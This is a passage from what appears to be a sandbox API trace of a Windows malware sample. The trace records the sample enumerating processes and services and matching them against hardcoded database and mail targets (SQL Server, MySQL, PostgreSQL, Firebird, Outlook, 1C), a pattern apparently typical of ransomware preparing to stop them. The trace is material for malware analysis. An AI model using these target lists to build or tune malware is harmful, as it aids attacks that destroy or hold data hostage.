(lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0245.030] lstrlenW (lpString="Themes") returned 6 [0245.030] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0245.030] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0245.030] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0245.030] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0245.030] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0245.030] lstrlenW (lpString="UxSms") returned 5 [0245.030] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0245.030] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0245.030] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0245.030] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0245.030] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0245.030] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0x3dee5b0 | out: hHeap=0xb00000) returned 1 [0245.030] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x208 [0245.034] Process32FirstW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0245.034] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0245.034] lstrlenW (lpString="System") returned 6 [0245.034] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0245.035] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0245.035] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0245.035] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0245.035] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0245.035] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0245.035] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0245.035] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0245.035] lstrlenW (lpString="smss.exe") returned 8 [0245.035] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0245.035] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0245.035] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0245.035] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0245.035] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0245.035] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0245.035] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0245.035] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0245.036] lstrlenW (lpString="csrss.exe") returned 9 [0245.036] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0245.036] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0245.036] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0245.036] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0245.036] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0245.036] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0245.036] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0245.036] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0245.036] lstrlenW (lpString="wininit.exe") returned 11 [0245.036] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0245.036] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0245.036] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0245.036] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0245.036] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0245.036] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0245.036] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0245.036] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0245.037] lstrlenW (lpString="csrss.exe") returned 9 [0245.037] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0245.037] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0245.037] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0245.037] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0245.037] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0245.037] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0245.037] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0245.037] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0245.037] lstrlenW (lpString="winlogon.exe") returned 12 [0245.037] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0245.037] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0245.037] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0245.037] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0245.037] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0245.037] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0245.037] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0245.037] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0245.038] lstrlenW (lpString="services.exe") returned 12 [0245.038] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0245.038] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0245.038] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0245.038] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0245.038] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0245.038] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0245.038] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0245.038] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x180, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0245.038] lstrlenW (lpString="lsass.exe") returned 9 [0245.038] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0245.038] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0245.038] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0245.038] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0245.038] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0245.038] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0245.038] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0245.038] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0245.039] lstrlenW (lpString="lsm.exe") returned 7 [0245.039] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0245.039] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0245.039] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0245.039] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0245.039] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0245.039] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0245.039] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0245.039] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.039] lstrlenW (lpString="svchost.exe") returned 11 [0245.039] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0245.039] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0245.039] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0245.039] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0245.039] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0245.040] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0245.040] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0245.040] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.040] lstrlenW (lpString="svchost.exe") returned 11 [0245.040] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0245.040] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0245.040] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0245.040] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0245.040] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0245.040] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0245.040] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0245.040] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.040] lstrlenW (lpString="svchost.exe") returned 11 [0245.040] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0245.040] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0245.040] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0245.041] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0245.041] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0245.041] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0245.041] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0245.041] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1b4, pcPriClassBase=13, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 1 [0245.041] lstrlenW (lpString="LogonUI.exe") returned 11 [0245.041] lstrcmpiW (lpString1="1c8.exe", lpString2="LogonUI.exe") returned -1 [0245.041] lstrcmpiW (lpString1="1cv77.exe", lpString2="LogonUI.exe") returned -1 [0245.041] lstrcmpiW (lpString1="outlook.exe", lpString2="LogonUI.exe") returned 1 [0245.041] lstrcmpiW (lpString1="postgres.exe", lpString2="LogonUI.exe") returned 1 [0245.041] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="LogonUI.exe") returned 1 [0245.041] lstrcmpiW (lpString1="mysqld.exe", lpString2="LogonUI.exe") returned 1 [0245.041] lstrcmpiW (lpString1="sqlservr.exe", lpString2="LogonUI.exe") returned 1 [0245.041] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.041] lstrlenW (lpString="svchost.exe") returned 11 [0245.041] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0245.041] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0245.042] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0245.042] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.042] lstrlenW (lpString="svchost.exe") returned 11 [0245.042] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0245.042] lstrlenW (lpString="audiodg.exe") returned 11 [0245.042] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.043] lstrlenW (lpString="svchost.exe") returned 11 [0245.043] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.043] lstrlenW (lpString="svchost.exe") returned 11 [0245.043] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0245.043] lstrlenW (lpString="userinit.exe") returned 12 [0245.043] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x340, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0245.043] lstrlenW (lpString="dwm.exe") returned 7 [0245.044] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x448, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0245.044] lstrlenW (lpString="explorer.exe") returned 12 [0245.044] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0245.044] lstrlenW (lpString="spoolsv.exe") returned 11 [0245.044] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0245.044] lstrlenW (lpString="taskhost.exe") returned 12 [0245.044] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.045] lstrlenW (lpString="svchost.exe") returned 11 [0245.045] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0245.045] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0245.045] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0245.045] lstrlenW (lpString="reader_sl.exe") returned 13 [0245.045] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x55c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0245.046] lstrlenW (lpString="cmd.exe") returned 7 [0245.046] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x18c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0245.046] lstrlenW (lpString="conhost.exe") returned 11 [0245.046] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x258, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0245.046] lstrlenW (lpString="dllhost.exe") returned 11 [0245.046] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mode.com")) returned 1 [0245.047] lstrlenW (lpString="mode.com") returned 8 [0245.047] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mode.com")) returned 0 [0245.047] CloseHandle (hObject=0x208) returned 1 [0245.047] Sleep (dwMilliseconds=0x1f4) [0245.663] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x47ea0b0 [0245.868] EnumServicesStatusExW (in: hSCManager=0x47ea0b0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 0 [0245.869] GetLastError () returned 0xea [0245.869] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc9a) returned 0x3dee5b0 [0245.869] EnumServicesStatusExW (in: hSCManager=0x47ea0b0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3dee5b0, cbBufSize=0xc9a, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3dee5b0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 1 [0245.869] CloseServiceHandle (hSCObject=0x47ea0b0) returned 1 [0245.869] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0245.869] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0245.869] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0245.869] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0245.869] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0245.869] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0245.869] lstrlenW (lpString="AudioSrv") returned 8 [0245.869] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0245.869] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0245.869] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0245.869] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0245.870] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0245.870] lstrlenW (lpString="BFE") returned 3 [0245.870] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0245.870] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0245.870] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0245.870] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0245.870] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0245.870] lstrlenW (lpString="CryptSvc") returned 8 [0245.870] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0245.870] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0245.870] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0245.870] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0245.870] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0245.870] lstrlenW (lpString="CscService") returned 10 [0245.870] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0245.870] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0245.870] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0245.870] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0245.870] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0245.870] lstrlenW (lpString="DcomLaunch") returned 10 [0245.870] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0245.870] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0245.870] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0245.870] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0245.870] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0245.870] lstrlenW (lpString="Dhcp") returned 4 [0245.870] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0245.870] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0245.870] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0245.870] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0245.870] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0245.870] lstrlenW (lpString="Dnscache") returned 8 [0245.871] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0245.871] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0245.871] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0245.871] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0245.871] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0245.871] lstrlenW (lpString="DPS") returned 3 [0245.871] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0245.871] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0245.871] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0245.871] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0245.871] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0245.871] lstrlenW (lpString="eventlog") returned 8 [0245.871] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0245.871] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0245.871] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0245.871] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0245.871] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0245.871] lstrlenW (lpString="EventSystem") returned 11 [0245.871] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0245.871] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0245.871] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0245.871] lstrcmpiW 